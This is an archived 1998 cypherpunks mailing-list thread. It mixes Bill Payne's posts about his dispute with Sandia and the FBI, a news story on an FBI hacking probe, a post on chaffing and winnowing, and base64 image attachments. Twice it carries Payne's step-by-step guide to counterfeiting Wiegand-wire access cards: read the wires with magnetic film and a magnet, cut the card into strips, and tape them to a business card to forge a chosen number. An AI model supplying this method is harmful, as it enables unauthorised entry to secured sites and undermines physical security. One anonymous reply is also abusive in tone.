        2    Build an ACCEPTABLE copy of the card.
     
        Bodell's clear explanation of the working of a Wiegand card can
        be visualized
     
             zero row    |     |   |
     
             one row        |          |
     
             binary      0  1  0   0   1
             representation
     
        Solutions to Task 1
     
             A    X-ray the card
     
             B    MAGNI VIEW FILM,  Mylar film reads magnetic fields ...
                  Edmunds Scientific Company, catalog 16N1, page
                  205, C33,447  $11.75
     
        is placed over the top of the Wiegand card.
     
        COW MAGNET,  Cow magnetics allow farmers to trap metal in the
        stomachs of their cows.  Edmunds, page 204, C31,101 $10.75
        is placed under the card.
     
        Location of the wires is easily seen on the green film.
     
        Mark the position of the wires with a pen.
     
        Next chop the card vertically using a shear into about 80/1000s
        paper-match-sized strips.
     
        Don't worry about cutting a wire or two.
     
        Note that a 0 has the pen mark to the top.  A 1 has the pen mark
        at the bottom.
     
        Take a business card and layout the "paper match"-like strips to
        counterfeit the card number desired.
     
        Don't worry about spacing.  Wiegand output is self-clocking!
     
        Tape the "paper-match - like" strips to the business card.
     
        Only the FUNCTION of the card needs to be reproduced!
     
                                     History
     
        Breaking electronic locks was done as "work for others" at Sandia
     
        National Laboratories beginning in 1992 funded by the Federal
        Bureau of Investigation/Engineering Research Facility, Quantico,
        VA.
     
        The FBI opined that this work was SECRET/NATIONAL SECURITY
        INFORMATION.
     
        Details of the consequences of this work are covered in
     
             Fired Worker File Lawsuit Against Sandia
             Specialist Says He Balked When Lab Sought Electronic
             Picklock Software, Albuquer Journal, Sunday April 25, 1993
     
             State-sanctioned paranoia,  EE Times, January 22, 1996
     
             One man's battle,  EE Times, March 22, 1994
     
             Damn the torpedoes,  EE Times, June 6, 1994
     
             Protecting properly classified info,  EE Times, April 11,
             1994
     
             DOE to scrutinize fairness in old whistle-blower cases,
             Albuquerque Tribune, Nov 7 1995
     
             DOE boss accelerates whistle-blower protection,  Albuquerque
             Tribune, March 27, 1996
     
             DOE doesn't plan to compensate 'old' whistle-blowers with
             money, Albuquerque Tribune September 27, 199
---
Here is one of my previous articles.

http://www.zolatimes.com/v2.29/bw1.html 
http://www.aci.net/kalliste/bw1

We should get this settled before IT GETS WORSE.

Black and white is an example of  WORSE.

bill payne

--Boundary..3999.1071713823.multipart/mixed
Content-Type: application/octet-stream; name="jpg00000.jpg"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="jpg00000.jpg"
Content-Description: ""

/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAoHBwgHBgoICAgLCgoLDhgQDg0N
Dh0VFhEYIx8lJCIfIiEmKzcvJik0KSEiMEExNDk7Pj4+JS5ESUM8SDc9Pjv/
2wBDAQoLCw4NDhwQEBw7KCIoOzs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7
Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozv/wAARCAB4AGEDASIAAhEBAxEB/8QA
HwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUF
BAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkK
FhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1
dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXG
x8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEB
AQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAEC
AxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRom
JygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOE
hYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU
1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD2DccnjI+t
IXI6/pTc+lBb3FIQ4SdCM4NJ5mTjk0znjimk45/WgCQtxkmm5zkZ60wnGfzr
jvGnim60aa3s7BhHM6GR3KAjByABn3Hp6VE5qCuzehQnXqKnDc7MfyppIzn0
qpp1zNd6dBczxiJ5UDlA2due3TrVjJwOapamUk4tpjgRj0waPX0o4PY0hGBk
c8cCmIVeDx3p4OetN9KMcdKBE2R/k0VF+J/z+NFAD88U3PbpSZwPSjOTjNAC
FuetNyTyaXIwf503PHr+NADZ547e3kmlYIkalmY9AAOa85uXm8feIVihXZp9
oTmUDnae5z3OOB2rU+I+rNb2MGnQsAbnLyEN/COxHoSf0rR8E6dHZeG7dxGF
luR5rtj7wP3f0x+tc037SpydFuevQj9Ww/1n7T0Xl5mvp1hb6XYRWdsGEUIw
u45PXJJ+p5qWO9t5LiW3jkDSw4Mid1znGfyNYfizxG/h6G2aOEStM/IJwNox
n8TkVwen+LLnT21ORYi81+c79+PLbnnpz1/SnOvCm1Eihl9bEQdXvt566/qe
vCVSAVbIPIIPFPMi4yDx3rkvA+qQXejQWP2kyXMEZLqc5C7jjk+gx+lXvFU1
1D4euXthICQBIycsiZ+Ygd+Pp9a0U04cxyyw8o1/Yvvb/gi23jTS5gjTCWBJ
pjFCZIziTGMtnoBk4rZ07U7HVLf7RZXAmjDFdwBGCO3NefWbx6rKY9MGGk/0
W1QfN9kg/jlPozc9cHnqa7/TtOttMs47W1jVI0UDAUZY46n396inOUt9jfF0
KNJaXT7f1/V79C3keh/MUUu0+p/OitrHnkZxjrTTkcGgHPcUcjvg0xCcZGel
I31peaCeM4zQM84+JcEi6lZ3JIKSRFBjsQc/+zCuj8D6it94bhQnL237pgcc
AdP0I/KtDxBo0euaVJaOdrfeib+6w6H+n415TBc6r4S1YjYYbhRh0flXU+uO
o+lcU26VXmezPfoRjjcIqKdpRO2+I0cMuhQ3GAzRzhVYHpkHI/QVwMg06S6l
eJ5YIBFuRGG5i+B8ufTdnk9h61Zg1l7me9hvHWO21F90uwZEbZyGA9j+Yq9e
6dPbRxf23bWtnDwfOhIaa52jAAwTjPrgDucmueo/aPmR6WGg8LBUpP0/4br/
AF3Ok+H+hy2tu+qTbf8ASUAiGTkLnnP1wKv+KJ5b65tvD1q7JLdnfO4HCwjO
fzx/nNW9S1u00Tw0l7ABsMarbJjhiV+UfTHP4Vl+BLhdVudS1W4IN9LIquAO
ETHygfke/YV1pRilSR4snUqSnjJrRbeuy+78zq7S1gsrdIIYlSNFCLj0HAq2
jDPQ1GFHXFOBxjg10nkttu7JMj/JoqPd/tL+VFMBgzj/AOtRnI5Hen7fxxTX
3bG2gMQOMnAoJIJ7u2tnijnuI43mbbGrMAXPoPWpe1eVa22vN4vVZytze25E
kSQAlVA+YBRgZx/SvVInWWJJAGAZQwBGDz6isqdTnbVtjuxOF9hCEr35kL7V
zfjTQrfVNHmuCqpc2qGRJAvJABJXPp/WulwTnrXL+ONfg07SZrBHzd3KFQow
dingk/hmiry8j5icGqjrx9nvc8rhjEj7S6pwSWY8Uss0szKZZXk2KFUsxOFH
QD2qPg+1SwQSXNxHBCuZJXCIPUk8fzrxtdj7ppLVnWeI7yWTwzpNisZ8pLaO
Z5W6E42hR78nj/Cum+HlvBH4eWWOILLLI3mPg5bBOP8AP1965ceBvEkyJazS
IIIzlQ8xKL9B/wDWr0TR9Oj0nS4LKLBWJcFufmPc/ic16NGMnUcmuh8xjqtG
OHVKnK7bvp+pfABYcj604DGKaD0B4+lPU8YzXaeCG36fnRSZ/wBuikAEAg55
pGyV6U/oCOM03nn2piOI8X2t1peu2niS0jEiRDZMD0HYE/UNj2x71vaf4p0X
UY8xX8SPjlJTsI/Pr+Fa0kSSoY3UMjcFSODWHe+CNBvpPMNn5Lf9MDsB/AcV
jyyi24dTvjWo1YRhWunHRNdvNC3/AIu8PWqvDLqCuSpBEG5j+BXofxrz5tEu
PEVw0uhaMbezVsCSSU5f3JY4P/Aema9Fs/B2g2X3NPikPcz/ALz+fFbCxLGg
SNFVVGAoGABUSpSqfH+BvSxlLC3+rptvvt9y/U8Angkt55IJUKyRsUZT1BBx
irWlajNpGoRX1uiPJETgSDIORjtj1rsfiL4e8qddZt0wknyThV6N2Y/Xp+Xr
XI6Rp6anq0FlLcC3EzbRJt3YOOOMjqcCvOlTlCpyrc+mpYiniMP7R7W1/U9I
0Tx5peoxRx3rraXJ42sCVJ9m7fjXUrg4Ibg9815RrPgTVdKO+2U38R/ihQ7h
9V5/TNQaF4s1LQrkIzyT26/K0ErHC/TP3TXZHESg+WqjxKuWUq0faYWV/L+t
vmewY/WlVSG4GaZBMlzBHOpykihlPqCMipQM/hXcfPtWdmG0en+fyop2P9r9
KKAGYA6HqetBJxzS4GMY4oPGeuPpQIaFyT6UpB7/AJ0u3B9sUuCRz0oAbtz0
pCT+PvT+cdM03Gc5oAq6jZw6jZzWVwu6KVdrD09DXirJNpGtbA4M9nPgMvIJ
U/8A1q9B8deKDYxHSrFx9plU+c3eNSOg9zn8B9RVLwN4RJePWL+Mrgh7eM45
4+8f6fT6Vw1l7Woox3XU+iwEnhMNKrVektl3/wCHO3vb6HT7CS8uDiOKMu2D
ycdh715DaWdx4r8SuIwsZuZGkcgcRr3/AMPcmuq+JOr/ADQaNCQeks2PyUfz
P5Vv+DvDy6FpgMoP2u4AaY5zt9FH0z+dVNe2qcvRGeHksFhXWfxT29P6/Q24
LdLeCOFBhI1CqOuAOKmAxxz+FAXrxn8afiuw8Ju4Y9v1opcn2ooAgHYkfXml
AwvFAUjgmngHBz1piEAIoxnPFL2pR7UgG7fSsrxFrcWgaTJdvtaU/LEhONzH
/DrWseBx0qhqeiadrSRrf23nCPO3LMuM9ehFTLmcXy7mtF01UTqfD1sef+DN
Ktte1SfUNTuluJY23G3k5L/7TZ6gen+T6cAAvyj6Vx0Hw30+K7MhvrkxH/lm
CASPQt6V19vbx21vHBEu2OJAiLknAAwOtZUIShGzR25hXp1pqUJXXa1rHnF5
4K1zW559Vm8uCWeUlbeVjuVewyB2FdF4Z0DX7CZJtS1V3jUHFvvLg8YGSemP
QV1WRjOKM+9EaEYvmW5NXMatSHs2lb02QdCO1Lt688UuRSZHQVueeG4etFLn
2ooACBTCB6UUUwAAbvrSEjoDRRSEOIJFNIBHOMdh2oopjFwPwoHIAJoooAUU
BsdTmiikAH9KO3SiimAbB6n86KKKQH//2Q==
--Boundary..3999.1071713823.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 28 Dec 1998 02:55:22 +0800
To: cypherpunks@toad.com
Subject: Re: Mixmaster client 4 the Mac OS?
In-Reply-To: <v04103602b2aa0cbdead5@209-20-2-109.dialin.interlog.com>
Message-ID: <199812271815.TAA27705@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 25 Dec 1998 22:48:46 -0500  Robert Guerra <az096@freenet.toronto.on.ca> wrote:

>> I heard sometime last summer that the mixmaster client 
>> was being ported to the Mac. Does anyone know the status
>> of this project?


>Perhaps it would be an interesting project which either used the 
>PGPsdk libraries, or GNUPG code...

What the fuck is this guy talking about?  PGPsdk libraries for
Mixmaster?

I must admit, I was surprised not to see a (l)user@aol.com in
this.  Go and play on the fuckwit PGP list and give us a break
over here.



Razor









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 29 Dec 1998 11:53:58 +0800
To: FitugMix <cypherpunks@cyberpass.net
Subject: Re: distribution scheme
In-Reply-To: <199812220853.JAA16038@jengate.thur.de>
Message-ID: <3.0.5.32.19981228010513.008cc410@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:53 AM 12/22/98 +0100, Falcon, aka FitugMix <tonne@thur.de>,
wrote about a suggestion to chop crypto or other contraband material 
into separate streams, e.g. bit 1 of each byte in stream 1, etc.,
hoping that this would be "legal" because it's not really encryption,
though if managed carefully it would still be hard to read.

That's of course a distinct question from "will this make the
information hard enough to notice that I won't get caught?";
the answer to that question depends on many factors besides the
direct details themselves, like who you use this to send things to,
and how you advertise the things you make available to send, etc.

> I'd like legal advice on this - is the idea correct? 

I'm not only not a US lawyer, I'm also not a German lawyer,
or a Chinese lawyer, or a Russian lawyer, and you're not paying me,
so this is not legal advice :-)  But my strongly considered 
engineering opinion is "Don't bet on it if it really matters."

If you use the system to distribute a copyrighted work,
you've still distributed a copyrighted work, even if you've 
shredded the paper and shipped the shreds and sticky-tape.  No win.

And if you try this in a country like China, where the laws are
arbitrary and defined on the spot, the fact that you may not have
violated the letters of a written law is potentially irrelevant.
The Chinese government is currently threatening to execute someone
who distributed 30000 email addresses of mainland Chinese to some
foreign human-rights activists - "assisting enemies of the state"
is seldom a well-defined crime; only the punishment is consistent. 

On the other hand, in countries that have well-defined laws,
and law enforcement organizations and courts that only enforce
the laws that are defined, and always want to enforce them correctly,
it can be entertaining to play with technologies like this.
Sometimes this gets them to change the rules, usually administratively
rather than through a public political process, but sometimes
it can make them look silly and feel bad about what they're doing.

Ron Rivest's "Chaffing and Winnowing" protocol is a great example,
and you can find details on your favorite web search engines.
	(Farming definitions: "Chaff" is the stuff you don't want
	that comes with wheat, like stems and hulls, and
	"winnowing" is the process of separating wheat from chaff.)
Basically, you define an authentication checksum that uses a key,
so only the sender and the intended recipient can validate a checksum.
Then you send a series of entries like
	BitNumber, 0, checksum(bitN,BitNumber,key), 1, checksum(bitN,BitNumber,Key)
where the checksum is correct depending on whether the bit N of the message
is a 0 or a 1.  There is no encryption used - only authentication,
so it's perfectly legal in some jurisdictions, but only the recipient
can tell which bits are "wheat" and which bits are "chaff".
One of the cool things about it is that you don't need to use
fake material as chaff - somebody else's wheat works just as well,
because the checksums fail if you use your key on their bits.
It's a very inefficient protocol, but there are ways to make it
less bad (not *good*, but at least less bad.)


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 28 Dec 1998 10:15:04 +0800
To: mail2news_nospam-19981227-alt.privacy.anon-server+alt.online-service.sprynet@anon.lcs.mit.edu
Subject: Mail2news@anon.lcs.mit.edu Not Propagating to Compuserve/Sprynet
Message-ID: <199812280147.CAA25100@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Has anyone else experienced posts sent via the anon.lcs.mit.edu
mail2news gateway not propagating to Compuserve/Sprynet's news
servers?  I've made a couple of posts, both anonymously and
non-anonymously via that gateway, and they haven't been showing up
at CIS/Sprynet.  Yet they've been archived on Dejanews and replies
to them from users on other servers have shown up.

Is this a propagation problem, or are Compuserve and Sprynet
blocking posts from that gateway?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 29 Dec 1998 03:13:47 +0800
To: abd@CDT.ORG
Subject: Hacking for Girlies and FBI news
Message-ID: <3687C285.172C@nmol.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3999.1071713823.multipart/mixed"

--Boundary..3999.1071713823.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

Monday 12/28/98 9:27 AM

John Young

BUSINESS OUTLOOK, Albuquerque Journal
Monday December 28, 1998 http://www.abqjournal.com/

Consultant feels heat from FBI

By Aaron Baca

Carolyn Meinel says she just
can't win.
  Three months ago - and
many times before and
since - the East Mountain author
and computer-security consultant
was the target of a diatribe left by
computer hackers who broke into
and vandalized the New York
Times' Web page, she says.
Now, Meinel says she is
suspected by the IBI as being one
of the culprits in the New York
Times computer hack.
  She says the FBI told her that
she's not a suspect, but asked her to
take a lie-detector test, which
suggests she is
  "The last contact I had with them
(the FBI) was about a month ago,"
Meinel said in a telephone
interview with the Journal. "I don't
think they would want me to take a
test if they weren't trying to trip
me tip up somehow so they could come
back at me later."
Meinel says she offered to assist
the FBI man investigation of the
incident because of her experience
with hackers and her experience
with those who took credit for that.
back - HFG, or Hacking for
Girlies.
  So far the FBI will not say if it
suspects Meinel. Doug Beldon, a
spokesman for the  Albuquerque
FBI office, said the FBI is
investigating the incident But he
said he couldn't comment about the
investigation.
  The New York Times web page
was attacked by a group claiming to
be HFG in September. The group
peppered the site with profanity
and pornographic images. They
also left hidden messages on the
page directed at Meinel and others..
Meinel is known in the hacker
community as the Happy Hacker
She has written two editions of a
book by the same title and helped
found an online community about
hacking. She has also written
numerous articles on computer
security, including a recent article
for Scientific American.
  In all of her articles, Meinel is
critical of some hackers for the
damage they can cause. She says
she promotes friendly hacking,
which she compares to the
tinkering or exploring shade-tree
mechanics often engage in on their
automobiles.
  The same group, HAG, is believed
to have broken into the computers
of Albuquerque Internet service
provider Rt66 in August. In that
attack, more than 1,400 credit
card numbers belonging to
subscribers were compromised.
  Meinel says she has been
advised by her own lawyer to
stay out of the case now.
  "There's a lot I Think I could have
offered the FBI, Meinel says.  "but I 
think it's wise not to say anthing now.  
I could get myself in trouble if I helped 
with this investigation now."
---
I am reading about html, reading our son's web site code - which he got
from another Moto employee - and experimenting by modifying it.

I just downloaded your stats and table code.  I studied you index.htm
and cryptome pages a bit yesterday.

Morales and I talked this morning.  

As soon as we get something working, then we will try to get others to
help.

Like Ashok Kaushal aka AK.

We plan to give the Great Satan some MORE deservedly
[http://www.zolatimes.com/v2.29/bw1.html]
REALLY BAD international press.

Until, of course, we get the Great Satan to shape-up and get some of his
messes SETTLED.

ABQ FBI agents Kohl and Schum attempted to intimidate me once.  US
Marshals too.
http://www.jya.com/whpscalia.htm

On the second occasion ABQ FBI agents Kohl and Moore delivered  US
assistant
attorney Gorrence's letter to me. http://www.jya.com/whprjg.htm

Moore apologized when Kohl handed me the letter.  

Nonetheless, this earned the instigators criminal complaint affidavits.
http://www.jya.com/whpscalia.htm

Kohl had on a black fanny pack.

FBI/Engineering Research Facility Special Supervisory Agents [SSA] I
worked with
carry their guns in fanny packs.  Holsters were too obvious the FBI told
me.

FBI SSAs also carry cell phones.

They need to phone in to find out what to do next.

Morales and I need picture of the Great Satan.  But, of course, being
law-abiding
citizens, we don't want to infringe anyone's registered trademark.

Campbell soup did not sue Andy Warhol.  

Therefore we will give Underwood full credit if we decide to use it
registered 
trademark to depict the Great Satan.

Back to .vxd writing.  I think I have to get win98 working today so I
can
run the 98ddk.

The vmm.inc macro which provides access to Microsoft's Windows Virtual
Machine Manager does not work the Hazzah or Thielen and Woodruff device
driver code.  

While I modified vmm.inc to expand without error, link 32 is giving an
error
on some of the segments declarations in the module definition file.

Until I get a working example of  Device Descriptor Block  accessed in
the 
protected mode, I am in a bit of trouble with my current conversion
project.

Sure wish we could get these UNFORTUNATE matters settled so that Morales
and I could spend time on other constructive projects.

Later
bill



Thursday 12/10/98 5:08 PM

J Kevin O'Brien, Chief
Freedom of Information-Privacy Act Section
Office of Public Affairs
U.S. Department of Justice
Federal Bureau of Investigation
Washington D. C. 20535

O'Brien

I received your form letter dated DEC 02 1998.

YES, I want the information!

I return your completed form.

Sandia assigned me to break electronic locks for the FBI/ERF.

SSA Mike Uttaro was my direct contact.  His boss was SSA Mike McDevitt.

The FBI is breaking the law under the veil of classification abuse.

I may write another article
---
False Security   
   
		        William H. Payne	   
                                      
  			Abstract   

Wiegand wire plastic credit card-sized entry access credentials are
the easiest to counterfeit.  Yet Access Control & SECURITY SYSTEMS 
INTEGRATION, September 1998 , www.prox.com  http/www.securitysolutions.com
 ran a full page ad.  
  
  "Why 130 million Wiegand cards are in use throughout the world .   
   
  The most secure of all access card technologies.   
   
  HID Wiegand cards are virtually impossible to counterfeit... any attempt to    
  alter them destroys them! ...   
   
  Since no direct contact with the card is required, they are totally enclosed,   
  making them absolutely immune to the elements and a frustration of   
  vandals. ...    
   
     	The secrets to the security of an   
  	HID Wiegand card are those little   
      	enclosed wire strips. Once corrupted,   
  	they won't work."   
  
Purpose of this article is to tell you how to counterfeit Wiegand 
http://www.securitysolutions.com/  and give you insight into Real Security. 
  
	Fumble, Bumble and Inept Funds Electronic Lock Breaking at   
	Sandia National Laboratories.   


http://www.jya.com/fbi-en7898.htm

			False Security   
   
		        William H. Payne	   
                                      
  			Abstract   

Wiegand wire plastic credit card-sized entry access credentials are
the easiest to counterfeit.  Yet Access Control & SECURITY SYSTEMS 
INTEGRATION, September 1998 , www.prox.com  http/www.securitysolutions.com
 ran a full page ad.  
  
  "Why 130 million Wiegand cards are in use throughout the world .   
   
  The most secure of all access card technologies.   
   
  HID Wiegand cards are virtually impossible to counterfeit... any attempt to    
  alter them destroys them! ...   
   
  Since no direct contact with the card is required, they are totally enclosed,   
  making them absolutely immune to the elements and a frustration of   
  vandals. ...    
   
     	The secrets to the security of an   
  	HID Wiegand card are those little   
      	enclosed wire strips. Once corrupted,   
  	they won't work."   
  
Purpose of this article is to tell you how to counterfeit Wiegand 
http://www.securitysolutions.com/  and give you insight into Real Security. 
  
	Fumble, Bumble and Inept Funds Electronic Lock Breaking at   
	Sandia National Laboratories.   


http://www.jya.com/fbi-en7898.htm
---
Counterfeiting Wiegand Wire Access Credentials
     
                                   Bill Payne
     
                                 October 16,1996
     
                                    Abstract
     
                  Wiegand wire access credentials are easy and
                  inexpensive to counterfeit.
     
        Access Control & Security Systems Integration magazine, October
        1996 [http://www/securitysolutions.com] published the article,
     
             Wiegand technology stands the test of time
     
             by PAUL J. BODELL, page 12
     
             Many card and reader manufacturers offer Wiegand (pronounced
             wee-gand) output.  However, only three companies in the
             world make Wiegand readers.  Sensor Engineering of Hamden
             Conn., holds the patent for Wiegand, and Sensor has licensed
             Cardkey of Simi Valley, Calif., and Doduco of Pforzheim,
             Germany, to manufacture Wiegand cards and readers. ...  A
             Wiegand output reader is not the same thing as a Wiegand
             reader,  and it is important to understand the differences.
     
                In brief, Wiegand reader use the Wiegand effect to
             translate card information around the patented Wiegand
             effect in which a segment of a specially treated wire
             generates an electronic pulse when subjected to a specific
             magnetic field.  If the pulse is generated when the wire is
             near a pick-up coil, the pulse can be detected by a circuit.
             Lining up several rows of wires and passing them by a cold
             would generate a series of pulses.  Lining up two rows of
             wires - calling on row "zero bits" and the other "one bits"
             - and passing them by two different coils would generate two
             series of pulses, or data bits.  These data bits can then be
             interpreted as binary data and used to control other
             devices.  If you seal the coils in a rugged housing with
             properly placed magnets, and LED and some simple circuitry,
             you have a Wiegand reader.  Carefully laminate the special
             wires in vinyl, and artwork, and hot-stamp a number on the
             vinyl, and you have a Wiegand card.
     
             IN THE BEGINNING
     
               Wiegand was first to introduce to the access control
             market in the late 1970s.  It was immediately successful
             because it filled the need for durable, secure card and
             reader technology.
               Embedded in the cards, Wiegand wires cannot be altered or
             duplicated. ...
     
        Bodell's Last statement is incorrect.
     
        Tasks for EASILY counterfeiting Wiegand wire cards are
     
        1    Locate the wires inside the card to read the 0s and 1s.
     
        2    Build an ACCEPTABLE copy of the card.
     
        Bodell's clear explanation of the working of a Wiegand card can
        be visualized
     
             zero row    |     |   |
     
             one row        |          |
     
             binary      0  1  0   0   1
             representation
     
        Solutions to Task 1
     
             A    X-ray the card
     
             B    MAGNI VIEW FILM,  Mylar film reads magnetic fields ...
                  Edmunds Scientific Company, catalog 16N1, page
                  205, C33,447  $11.75
     
        is placed over the top of the Wiegand card.
     
        COW MAGNET,  Cow magnetics allow farmers to trap metal in the
        stomachs of their cows.  Edmunds, page 204, C31,101 $10.75
        is placed under the card.
     
        Location of the wires is easily seen on the green film.
     
        Mark the position of the wires with a pen.
     
        Next chop the card vertically using a shear into about 80/1000s
        paper-match-sized strips.
     
        Don't worry about cutting a wire or two.
     
        Note that a 0 has the pen mark to the top.  A 1 has the pen mark
        at the bottom.
     
        Take a business card and layout the "paper match"-like strips to
        counterfeit the card number desired.
     
        Don't worry about spacing.  Wiegand output is self-clocking!
     
        Tape the "paper-match - like" strips to the business card.
     
        Only the FUNCTION of the card needs to be reproduced!
     
                                     History
     
        Breaking electronic locks was done as "work for others" at Sandia
     
        National Laboratories beginning in 1992 funded by the Federal
        Bureau of Investigation/Engineering Research Facility, Quantico,
        VA.
     
        The FBI opined that this work was SECRET/NATIONAL SECURITY
        INFORMATION.
     
        Details of the consequences of this work are covered in
     
             Fired Worker File Lawsuit Against Sandia
             Specialist Says He Balked When Lab Sought Electronic
             Picklock Software, Albuquer Journal, Sunday April 25, 1993
     
             State-sanctioned paranoia,  EE Times, January 22, 1996
     
             One man's battle,  EE Times, March 22, 1994
     
             Damn the torpedoes,  EE Times, June 6, 1994
     
             Protecting properly classified info,  EE Times, April 11,
             1994
     
             DOE to scrutinize fairness in old whistle-blower cases,
             Albuquerque Tribune, Nov 7 1995
     
             DOE boss accelerates whistle-blower protection,  Albuquerque
             Tribune, March 27, 1996
     
             DOE doesn't plan to compensate 'old' whistle-blowers with
             money, Albuquerque Tribune September 27, 199
---
Here is one of my previous articles.

http://www.zolatimes.com/v2.29/bw1.html 
http://www.aci.net/kalliste/bw1

We should get this settled before IT GETS WORSE.

Black and white is an example of  WORSE.

bill payne

--Boundary..3999.1071713823.multipart/mixed
Content-Type: application/octet-stream; name="jpg00001.jpg"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="jpg00001.jpg"
Content-Description: ""

/9j/4AAQSkZJRgABAgAAAQABAAD/4ByKSkZYWAATQCbh393i49/h6eLp7OT0
9vbv9PH4+vv+//v////////n7+Hv8uzv8e/t7Ovl5+Ln6+fo7Orr8Oru7uvp
6+bu7Ovx8Oru7eX29/n1+Pbt7u/o7eXn5d/19fj19vHj5uHd4dr7+fn///74
9/X1+vjz9fP2+vbz+vf+///7/v/////////////7//nz+fj5///6//n6///4
+/jx9/H9///////////////////////////////////////////6//3s7+/k
49zf4+Du8+7q7ur///f/////////////////////////////////////////
/+7/////////////////////////////////////////////////////////
//r+//z09fX///35+fr1+vX4+/f//v/////////+/vz///79///19ffy9+/3
+/f09/P+///2+fb5+vfx8vHp7+v0+fX8//7///3///////////////////3/
///7//v3/fn3//v////////////////z9fXy8fXt7+zq7ej19vbx9fLv8u/w
8u3s7PDz8/Pw8ez1+vb////////8///////k6ek1MjP//fr///9xZFx2aFiK
fnLk6tt+a2D///////3+//n49vL8/fv////////////9///6+/n/////////
///8//31+Pb3+vj6/vj7/fv///36/fz4+/nt8+3s9PHv8+7r8e7x9fPv8u/7
//v9//7y+fT4+PDw9/H5/Pj1+fj5/Prz8/P4+fbr7+3t7+zv8/Dx9PH1+fX5
//r7/Pf8//j29fTy8O7q7uvt7Ojr8Ojr7evw8PDr7u0gHhzv9vLQ19EjISLs
7ubt7u4VFhMTGBH4/Pr///96bWL///9ZVlA2NjTv8u329vL6//n39/L2+/js
8fPq8e/4/vj7+/35//z4/Pz1+vP2+/X1/fn4+fj1/Pn6/Pf////w8u7w8/bp
7Ons9fDp8Ovr8e7o7ezv8/H1/ff5+vj7/fz1+vf7/Pv3+vnt8/Pw8vP3/fjy
/fn3+/f19/P1/vzz+vb4/Pn4+/vx9u7y8/T19fTz+PM4OTbh5uAJEArn5+fk
5N0UEhGvEwLi390VGBMeGBXo6eXf4uEYGw/T2dkeGBUxLyjx8e3z8useIBvr
6+vp6ujq8O3z+PTv7+/4/fn3+fT2+vX4+vjz+fXy+vT1+Pb7/Pru7+v0+/nz
7+/5/Pn0/Pfs8+/q7ebu7/Hs8ezv8+z0/fjr8+/3/Pfu7O7z/Pn1+fbz+fb2
9vby9PT6///5/vv7//z9/v/8//7///76/vr09/X2+/n09PDx9fHx8O8dGhbr
7+oaGBbm5OMTDwrq6+jo2ti+EwDh2trr6OTt7Oru7+718/Hr6urr8O7j5N0Z
FhXv7uzs7OcYFhMYFg02Linr8uvt7ez09vT19fTu8/Hz8fHx+Pjx8+/x8er0
8vXy9PHz9/b3+fXx8e75+fj7//nw9fPy9O3v9vbx8/Lt9PDs8uzr8O7w+PHy
8/H5+/fw9PDy9/L19vT0+PT6/Pv8//v5//v////////7/vz5/Pf3/P7u8vXz
+/nx8fHs9fAwKR4YGAkYERMbGQ/m5uTw8PHi29nDGADOOino6uTu6u3v7+v6
9/Xu9vHx7+z29fHv7uzs7OcxKyPf398eHBIWFhAcHRb2+PXz9fX5//z0+vLy
8e7v9fXq8Ont8vHt8u7w8e/49vX19/P1+PXv8vP2+vnz+fb1+PPs8ezv8erp
7+vs8e/t8/Dz+PHt9PTx9/Lu7+v0+/jv8+70+vX8/f/6//36///6/vv9/vv7
//z3+ffy9vTz+PTv7+gdGhv29/k0JiRALyn29PP08uv49fLp6eXNIg3nuarx
7er38+/t7+z38+75+PX59e/18/H08uzy8evq5eXGKA7j0c7x6usZGhYmICAu
MC73+fn09vXz9u7u9PLz9PLp8ers7uvr7+3v8e/w7ur1+fD1+Pb1+fbu8fD5
/Prw9fTp7Orr6urq8Ovn7ers8O7u9vTv8ef3/PPy9/Xy+Pfp6+z6+vb3+/j+
///8/fn1+Pf+//z5/vv09fX39ff1/PY7NSnp7u36+/T5+PO8sq/6+Pr18vD1
8/LPJhXRJxL7+PX39fT99/X49e7iYU349vP28e728u/v7OXx7ezDIADn4Nrk
4eHx7un09PHn6ufs7+ro6uXu8u/y9PHg4+Dh4ePc4d7f49zf393e4tzi6eD2
+Pby8+zs8ezr8/Dp7unn7OXm7ujk5uPp7+vo7efp7ezr9Ovp7efq8Ojn6Ofo
8e3q8+34+vf6+Pj4/vf+//////7////z9vL4/vns8+zl7OMeHBodGhX19vMj
HRzz8+308vL39/f15enSIwz38fDz8u728PT55+TSJRLTLh3MJxLeYVf38+/s
7ejp6Nvr493LKRXMIg7y8e719u/v8vBdS1Da4eDs7esaGBTS2dcaGBXd5N3k
